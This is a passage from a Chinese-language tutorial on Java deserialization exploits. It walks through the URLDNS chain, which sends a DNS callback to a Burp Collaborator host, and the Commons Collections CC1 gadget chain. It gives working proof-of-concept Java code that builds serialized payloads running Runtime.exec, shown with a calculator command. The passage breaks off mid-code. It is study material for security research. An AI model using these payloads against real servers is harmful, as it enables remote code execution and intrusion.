<h3 id="怎么发现的"><a href="#怎么发现的" class="headerlink" title="怎么发现的"></a>怎么发现的</h3><p>想找RCE但是找不到，退而求其次找一个SSRF。<br>人肉找链子一般从后往前找，可以找一些Object（Object类是所有类的始祖）类型原生存在的方法，如下面的hashCode<br><img src="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649535390463-729f32a9-7473-477e-9cee-42d4101e3c88.png" alt="image.png"><br>SSRF即要发起请求，那么发起请求用到java中的URL类<br>看到URL类是可被序列化的（实现了Serializable接口），那么就有搞头<br><img src="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649451290579-64fe91f7-a29c-4970-bb09-95b54be08e20.png" alt="image.png"><br>看到他存在重写的hashCode函数<br><img src="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649451467831-5ded5f0f-e064-4e20-a9fa-89e775c450be.png" alt="image.png"><br>并且调用了handler的hashCode方法，里面的getHostAddress方法意思是根据域名获取服务器地址，那么就能发起DNS请求<br><img src="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649451548891-5bbfb75b-d899-477c-ae33-0ded740ff7cf.png" alt="image.png"><br>也就是说我们如果调用了URL类的hashcode方法就可以让服务器往目标url发起DNS请求</p>
<h3 id="利用链-gt-入口类"><a href="#利用链-gt-入口类" class="headerlink" title="利用链-&gt;入口类"></a>利用链-&gt;入口类</h3><p>hashCode是Object类原生的函数<strong>java.util.Objects#hashCode，</strong>那么hashMap里面肯定也有<br>先看看hashMap里的readObject，调用putVal和hash函数</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> <span class="keyword">void</span> <span class="title function_">readObject</span><span class="params">(java.io.ObjectInputStream s)</span></span><br><span class="line">        <span class="keyword">throws</span> IOException, ClassNotFoundException &#123;</span><br><span class="line">        ......</span><br><span class="line">        <span class="keyword">else</span> <span class="keyword">if</span> (mappings &gt; <span class="number">0</span>) &#123; </span><br><span class="line">            ......</span><br><span class="line">            <span class="keyword">for</span> (<span class="type">int</span> <span class="variable">i</span> <span class="operator">=</span> <span class="number">0</span>; i &lt; mappings; i++) &#123;</span><br><span class="line">                <span class="meta">@SuppressWarnings(&quot;unchecked&quot;)</span></span><br><span class="line">                    <span class="type">K</span> <span class="variable">key</span> <span class="operator">=</span> (K) s.readObject();</span><br><span class="line">                <span class="meta">@SuppressWarnings(&quot;unchecked&quot;)</span></span><br><span class="line">                    <span class="type">V</span> <span class="variable">value</span> <span class="operator">=</span> (V) s.readObject();</span><br><span class="line">                putVal(hash(key), key, value, <span class="literal">false</span>, <span class="literal">false</span>);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p>其中hash函数调用了key的hashCode方法<br><img src="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649453944051-01afb504-8c35-4e86-83d4-3f061d0a6d2c.png" alt="image.png"><br>这样的话我们只需要创建一个hashMap，把构造的URL扔进去当key，在反序列化的时候就可以执行URL的hashCode方法，也就请求了构造的url地址<br>先用下图代码尝试生成反序列化数据<br><img src="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649172784313-862611dd-cbe4-409a-89a5-663cd0da2340.png" alt="image.png"><br>发现在生成过程中burp就收到了请求，并且在反序列化过程burp不再收到新的请求，这显然不符合我们的期望<br>原因是在put的过程中hashMap类就调用了hash方法，并且URL中的hash方法中判断该hashcode不为初始化的值（-1）时会直接返回，在序列化的时候已经进行了hashCode计算，那么在反序列化时就不会走到他真正的handler.hashCode方法里<br><img src="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649454325443-a5b3f4d3-611d-4d4b-909b-d2f935dcaa50.png" alt="image.png"><br>那么如何解决呢</p>
<ul>
<li>在生成的时候把url对象的hashcode改成不为-1的值</li>
<li>在put之后把hashcode改回-1</li>
</ul>
<p>这就利用到前置知识里的反射，exp代码如下</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        HashMap&lt;URL, Integer&gt; hashMap = <span class="keyword">new</span> <span class="title class_">HashMap</span>&lt;URL, Integer&gt;();</span><br><span class="line">        <span class="type">URL</span> <span class="variable">url</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">URL</span>(<span class="string">&quot;http://89fgdxhswhfmugcuvdz9vh4rhinbb0.burpcollaborator.net&quot;</span>);</span><br><span class="line">        <span class="comment">// 获取url的类，可以通过 Object 类中的 getCLass() 方法来获取字节码，使用这种方法时必须明确具体的类，然后创建对象。</span></span><br><span class="line">        Class&lt;? <span class="keyword">extends</span> <span class="title class_">URL</span>&gt; c = url.getClass();</span><br><span class="line">        <span class="comment">// 获取类声明的参数hashCode</span></span><br><span class="line">        <span class="type">Field</span> <span class="variable">hashCodeField</span> <span class="operator">=</span> c.getDeclaredField(<span class="string">&quot;hashCode&quot;</span>);</span><br><span class="line">        <span class="comment">// 设置私有参数可修改</span></span><br><span class="line">        hashCodeField.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        <span class="comment">// 修改hashCode</span></span><br><span class="line">        hashCodeField.set(url, <span class="number">1</span>);</span><br><span class="line">        hashMap.put(url , <span class="number">1</span>);</span><br><span class="line">        <span class="comment">// 将hashCode改回-1</span></span><br><span class="line">        hashCodeField.set(url, -<span class="number">1</span>);</span><br><span class="line">        serialize(hashMap);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>生成后进行反序列化<br><img src="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649174775659-e4d663c3-c4a0-41f2-ad73-0f8180b35592.png" alt="image.png"><br>burp正常收到DNS请求<br><img src="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649174751093-6b074486-0ca1-41a0-813c-067d550f7be2.png" alt="image.png"></p>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><ul>
<li>首先找到sink：发起DNS请求的URL类hashCode方法</li>
<li>完了看谁能调用URL类的hashCode方法（找gadget），发现HashMap行（他重写了hashCode方法，执行了Map里面key的hashCode方法，HashMap而key的类型可以是URL类），而且<strong>HashMap的readObject方法直接调用了hashCode方法</strong></li>
<li>exp的思路就是创建一个HashMap，往里面丢一个URL当key，然后序列化它</li>
<li>在反序列化的时候自然就会执行HashMap的readObject-&gt;hashCode-&gt;URL的hashCode-&gt;DNS请求</li>
</ul>
<h2 id="CC1"><a href="#CC1" class="headerlink" title="CC1"></a>CC1</h2><h3 id="目标-sink"><a href="#目标-sink" class="headerlink" title="目标-sink"></a>目标-sink</h3><p>这次我们的目标是RCE，首先我们知道怎么弹计算器：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Runtime.getRuntime().exec(<span class="string">&quot;open -a /System/Applications/Calculator.app&quot;</span>);</span><br></pre></td></tr></table></figure>
<p>然后要找谁能让我们执行上面的命令<br>org.apache.commons.collections.functors.InvokerTransformer这个类很有趣<br>首先它满足能够序列化的条件<br>他有个transform方法，这不就是我们上文中的反射获取方法并调用吗<br>它接受一个类型，获取这个类型的方法名和参数并调用，其中方法名和参数在类的构造函数中赋值<br><img src="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649536422894-29f8c4be-b620-43a1-9c84-70ef83cd62cc.png" alt="image.png"><br>那么上面的命令执行语句怎么改写成以InvokerTransformer.transform方法实现的版本？<br>首先反射弹计算器如下</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 反射弹计算器</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">reflectionCodeExcution</span><span class="params">()</span> <span class="keyword">throws</span> InvocationTargetException, IllegalAccessException, NoSuchMethodException &#123;</span><br><span class="line">    <span class="type">Runtime</span> <span class="variable">r</span> <span class="operator">=</span> Runtime.getRuntime();</span><br><span class="line">    <span class="type">Class</span> <span class="variable">c</span> <span class="operator">=</span> Runtime.class;</span><br><span class="line">    <span class="type">Method</span> <span class="variable">runtimeMethod</span> <span class="operator">=</span> c.getMethod(<span class="string">&quot;exec&quot;</span>, String.class);</span><br><span class="line">    runtimeMethod.invoke(r, <span class="string">&quot;open -a /System/Applications/Calculator.app&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>稍加改造就能得到一个由InvokerTransformer.transform方法实现的命令执行</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// InvokerTransformer弹计算器</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">invokerTransFormerCodeExcution</span><span class="params">()</span>&#123;</span><br><span class="line">        <span class="type">Runtime</span> <span class="variable">r</span> <span class="operator">=</span> Runtime.getRuntime();</span><br><span class="line">        <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;exec&quot;</span>,</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class&#125;,</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;open -a /System/Applications/Calculator.app&quot;</span>&#125;)</span><br><span class="line">                .transform(r);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p>很不幸的是Runtime是不能序列化的，那么怎么将Runtime构造出来？<br>我们找到了<strong>ChainedTransformer</strong>和<strong>ConstantTransformer</strong><br>其中ConstantTransformer是传入什么就返回什么，ChainedTransformer可以将多个Transfoermer串起来进行链式调用</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">Transformer[] transformers = <span class="keyword">new</span> <span class="title class_">Transformer</span>[]&#123;</span><br><span class="line">        <span class="keyword">new</span> <span class="title class_">ConstantTransformer</span>(Runtime.class),</span><br><span class="line">        <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;getMethod&quot;</span>,</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class, Class[].class&#125;,</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;getRuntime&quot;</span>, <span class="literal">null</span>&#125;),</span><br><span class="line">        <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;invoke&quot;</span>,</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;Object.class, Object[].class&#125;,</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="literal">null</span>, <span class="literal">null</span>&#125;),</span><br><span class="line">        <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;exec&quot;</span>,</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class&#125;,</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;open -a /System/Applications/Calculator.app&quot;</span>&#125;)</span><br><span class="line">&#125;;</span><br><span class="line"><span class="type">ChainedTransformer</span> <span class="variable">chainedTransformer</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ChainedTransformer</span>(transformers);</span><br></pre></td></tr></table></figure>
<p>于是sink就得到了，一旦执行我们构造的chainedTransformer.transform方法，就能代码执行</p>
<h3 id="利用链-gadget"><a href="#利用链-gadget" class="headerlink" title="利用链-gadget"></a>利用链-gadget</h3><p>那么谁能执行transform方法呢<br>故名思议transform方法就是转换的意思，Transformer类就是转换器类<br>通过idea的查找用例find usages功能，我们可以看到有二十来个地方能够调用transform方法，可以一个个慢慢看<br><img src="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649348540566-7f56136f-e2f9-4a71-91f2-d1ac3b99ddba.png" alt="image.png"><br>比如Lazymap的get函数调用了transform<br><img src="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649348850697-58eb7be1-ff0a-46de-b1e6-f497eca8c727.png" alt="image.png"><br>又有TransformedMap的checkSetValue方法也调用了transform<br><img src="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649537700103-3e482177-65e2-431b-9bfe-3604e5261286.png" alt="image.png"><br>TransformedMap类顾名思义就是被转换的map类，他的构造函数接受一个map，一个对key的转换器keyTransformer，一个对value的转换器valueTransformer做为参数，那么上面checkSetValue方法的作用就是对value值通过转换器做处理了。<br><img src="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649537905913-90de9003-6e32-483d-89b3-8ae64e875247.png" alt="image.png"><br>于是我们需要寻找谁能调用checkSetValue，只有一条结果，就是org.apache.commons.collections.map.AbstractInputCheckedMapDecorator.MapEntry里的setValue方法<br><img src="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649538443627-c356185a-7111-4a4c-824f-1b730f4d7b02.png" alt="image.png"><br>MapEntry做java开发的都不陌生，在我们对map做遍历的时候就会用到（可以看看下面代码），那么我们离成功更近了一步</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// TransformedMap弹计算器</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">transformedMapCodeExcution</span><span class="params">()</span>&#123;</span><br><span class="line">    <span class="type">Runtime</span> <span class="variable">r</span> <span class="operator">=</span> Runtime.getRuntime();</span><br><span class="line">    <span class="type">InvokerTransformer</span> <span class="variable">invokerTransformer</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;exec&quot;</span>,</span><br><span class="line">            <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class&#125;,</span><br><span class="line">            <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;open -a /System/Applications/Calculator.app&quot;</span>&#125;);</span><br><span class="line">    HashMap&lt;Object, Object&gt; hashMap = <span class="keyword">new</span> <span class="title class_">HashMap</span>&lt;&gt;();</span><br><span class="line">    <span class="comment">// 一个键值对就是一个Entry</span></span><br><span class="line">    hashMap.put(<span class="string">&quot;k&quot;</span>,<span class="string">&quot;v&quot;</span>);</span><br><span class="line">    Map&lt;Object,Object&gt; transformedMap = TransformedMap.decorate(hashMap, <span class="literal">null</span>, invokerTransformer);</span><br><span class="line">    <span class="comment">// 如下为遍历map的写法之一，由于TransformedMap里面没有setValue，会找到他的父类也就是抽象类AbstractInputCheckedMapDecorator的setValue</span></span><br><span class="line">    <span class="keyword">for</span> (Map.Entry entry: transformedMap.entrySet())&#123;</span><br><span class="line">         entry.setValue(r);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>现在我们只需要找哪个地方能够遍历map并且调用<strong>setValue</strong>方法</p>
<h3 id="入口类source"><a href="#入口类source" class="headerlink" title="入口类source"></a>入口类source</h3><p>看到sun.reflect.annotation.AnnotationInvocationHandler的<strong>readObject</strong>里调用了，那么说明它可能就是我们的source入口类了<br><img src="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649539029939-1555f512-07fe-413e-80b1-b4cef4534c69.png" alt="image.png"><br>这个类是个动态代理的调用处理器类，构造函数接受一个map<br><img src="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649354357798-9ccde84a-3ee6-4890-b07e-536d6e17ff30.png" alt="image.png"><br>看看他的readObject代码，memberValues就是构造函数传入的map，我们就可以传入一个hashMap进去，让他setValue就好了</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> <span class="keyword">void</span> <span class="title function_">readObject</span><span class="params">(java.io.ObjectInputStream s)</span></span><br><span class="line">        <span class="keyword">throws</span> java.io.IOException, ClassNotFoundException &#123;</span><br><span class="line">        s.defaultReadObject();</span><br><span class="line"></span><br><span class="line">        <span class="comment">// Check to make sure that types have not evolved incompatibly</span></span><br><span class="line"></span><br><span class="line">        <span class="type">AnnotationType</span> <span class="variable">annotationType</span> <span class="operator">=</span> <span class="literal">null</span>;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            annotationType = AnnotationType.getInstance(type);</span><br><span class="line">        &#125; <span class="keyword">catch</span>(IllegalArgumentException e) &#123;</span><br><span class="line">            <span class="comment">// Class is no longer an annotation type; time to punch out</span></span><br><span class="line">            <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">java</span>.io.InvalidObjectException(<span class="string">&quot;Non-annotation type in annotation serial stream&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        Map&lt;String, Class&lt;?&gt;&gt; memberTypes = annotationType.memberTypes();</span><br><span class="line"></span><br><span class="line">        <span class="comment">// If there are annotation members without values, that</span></span><br><span class="line">        <span class="comment">// situation is handled by the invoke method.</span></span><br><span class="line">        <span class="keyword">for</span> (Map.Entry&lt;String, Object&gt; memberValue : memberValues.entrySet()) &#123;</span><br><span class="line">    <span class="comment">// 这里name是我们传入的第二个参数map里面的key</span></span><br><span class="line">            <span class="type">String</span> <span class="variable">name</span> <span class="operator">=</span> memberValue.getKey();</span><br><span class="line">    <span class="comment">// 表示从成员变量中获取和key相同的变量</span></span><br><span class="line">            Class&lt;?&gt; memberType = memberTypes.get(name);</span><br><span class="line">    <span class="comment">// 有成员变量并且和key相同才能往里走</span></span><br><span class="line">            <span class="keyword">if</span> (memberType != <span class="literal">null</span>) &#123;  <span class="comment">// i.e. member still exists</span></span><br><span class="line">    <span class="comment">// 这里的value为传入的第二个参数map的value</span></span><br><span class="line">                <span class="type">Object</span> <span class="variable">value</span> <span class="operator">=</span> memberValue.getValue();</span><br><span class="line">    <span class="comment">// 在这里判断成员变量的名称&lt;key&gt;和&lt;value&gt;这两个对象能不能强制类型转换</span></span><br><span class="line">                <span class="keyword">if</span> (!(memberType.isInstance(value) ||</span><br><span class="line">                      value <span class="keyword">instanceof</span> ExceptionProxy)) &#123;</span><br><span class="line">                    memberValue.setValue(</span><br><span class="line">                        <span class="keyword">new</span> <span class="title class_">AnnotationTypeMismatchExceptionProxy</span>(</span><br><span class="line">                            value.getClass() + <span class="string">&quot;[&quot;</span> + value + <span class="string">&quot;]&quot;</span>).setMember(</span><br><span class="line">                                annotationType.members().get(name)));</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p>如上注释内容，我们想让它走到31行setValue那一步，需要满足他的if判断，那么可以构造如下代码，这里用反射获取AnnotationInvocationHandler是因为他的构造函数是default类型，那么在java中只能由同一个包下的函数直接构造，我们不在同一个包里，只能通过反射的方式获取。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">hashMap.put(<span class="string">&quot;value&quot;</span>,<span class="string">&quot;v&quot;</span>);</span><br><span class="line">        Map&lt;Object,Object&gt; transformedMap = TransformedMap.decorate(</span><br><span class="line">                hashMap,</span><br><span class="line">                <span class="literal">null</span>,</span><br><span class="line">                chainedTransformer);</span><br><span class="line"></span><br><span class="line"><span class="comment">// 先获取类</span></span><br><span class="line"><span class="type">Class</span> <span class="variable">c</span> <span class="operator">=</span> Class.forName(<span class="string">&quot;sun.reflect.annotation.AnnotationInvocationHandler&quot;</span>);</span><br><span class="line"><span class="comment">// 再取构造器</span></span><br><span class="line"><span class="type">Constructor</span> <span class="variable">annotationInvocationHandlerConstructor</span> <span class="operator">=</span> c.getDeclaredConstructor(Class.class, Map.class);</span><br><span class="line"><span class="comment">// 确保可访问</span></span><br><span class="line">annotationInvocationHandlerConstructor.setAccessible(<span class="literal">true</span>);</span><br><span class="line"><span class="comment">// 为了走进readObject的第一个if判断：必须将注解调用控制器构造器的构造方法参数设置为含有成员变量的类</span></span><br><span class="line"><span class="type">Object</span> <span class="variable">o</span> <span class="operator">=</span> annotationInvocationHandlerConstructor.newInstance(Target.class, transformedMap);</span><br></pre></td></tr></table></figure>
<p>到这里整条链就完成了，将上面代码的o进行序列化就得到payload，服务器在对o进行反序列化的时候就通过以下调用链完成代码执行</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">AnnotationInvocationHandler.readObject()</span><br><span class="line">    AbstractInputCheckedMapDecorator.MapEntry#setValue()</span><br><span class="line">        TransformedMap.checkSetValue()</span><br><span class="line">            ChainedTransformer.transform()</span><br><span class="line">                ConstantTransformer.transform()</span><br><span class="line">                    InvokerTransformer.transform()</span><br></pre></td></tr></table></figure>
<p>而ysoserial中CC1链利用了另一个类，也就是上文提到的LazyMap，也能行得通</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">AnnotationInvocationHandler.readObject()</span><br><span class="line">   *Map(Proxy).entrySet()</span><br><span class="line">        *AnnotationInvocationHandler.invoke()</span><br><span class="line">            LazyMap.get()/TransformedMap.setValue()</span><br><span class="line">                ChainedTransformer.transform()</span><br><span class="line">                    ConstantTransformer.transform()</span><br><span class="line">                        InvokerTransformer.transform()</span><br></pre></td></tr></table></figure>
<p>完整poc代码如下</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.chaitin.CC1test;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> com.chaitin.Serialization;</span><br><span class="line"><span class="keyword">import</span> com.chaitin.Unserialization;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.Transformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ChainedTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ConstantTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.InvokerTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.map.TransformedMap;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.IOException;</span><br><span class="line"><span class="keyword">import</span> java.lang.annotation.Target;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Constructor;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.InvocationTargetException;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Method;</span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br><span class="line"><span class="keyword">import</span> java.util.Map;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">CC1Test</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span></span><br><span class="line">            NoSuchMethodException,</span><br><span class="line">            InvocationTargetException,</span><br><span class="line">            IllegalAccessException, ClassNotFoundException, IOException, InstantiationException &#123;</span><br><span class="line"></span><br><span class="line">        Transformer[] transformers = <span class="keyword">new</span> <span class="title class_">Transformer</span>[]&#123;</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">ConstantTransformer</span>(Runtime.class),</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;getMethod&quot;</span>,</span><br><span class="line">                        <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class, Class[].class&#125;,</span><br><span class="line">                        <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;getRuntime&quot;</span>, <span class="literal">null</span>&#125;),</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;invoke&quot;</span>,</span><br><span class="line">                        <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;Object.class, Object[].class&#125;,</span><br><span class="line">                        <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="literal">null</span>, <span class="literal">null</span>&#125;),</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;exec&quot;</span>,</span><br><span class="line">                        <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class&#125;,</span><br><span class="line">                        <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;open -a /System/Applications/Calculator.app&quot;</span>&#125;)</span><br><span class="line">        &#125;;</span><br><span class="line"></span><br><span class="line">        <span class="type">ChainedTransformer</span> <span class="variable">chainedTransformer</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ChainedTransformer</span>(transformers);</span><br><span class="line"></span><br><span class="line">        HashMap&lt;Object, Object&gt; hashMap = <span class="keyword">new</span> <span class="title class_">HashMap</span>&lt;&gt;();</span><br><span class="line">        <span class="comment">// 一个键值对就是一个Entry</span></span><br><span class="line">        hashMap.put(<span class="string">&quot;value&quot;</span>,<span class="string">&quot;v&quot;</span>);</span><br><span class="line">        Map&lt;Object,Object&gt; transformedMap = TransformedMap.decorate(</span><br><span class="line">                hashMap,</span><br><span class="line">                <span class="literal">null</span>,</span><br><span class="line">                chainedTransformer);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 先获取类</span></span><br><span class="line">        <span class="type">Class</span> <span class="variable">c</span> <span class="operator">=</span> Class.forName(<span class="string">&quot;sun.reflect.annotation.AnnotationInvocationHandler&quot;</span>);</span><br><span class="line">        <span class="comment">// 再取构造器</span></span><br><span class="line">        <span 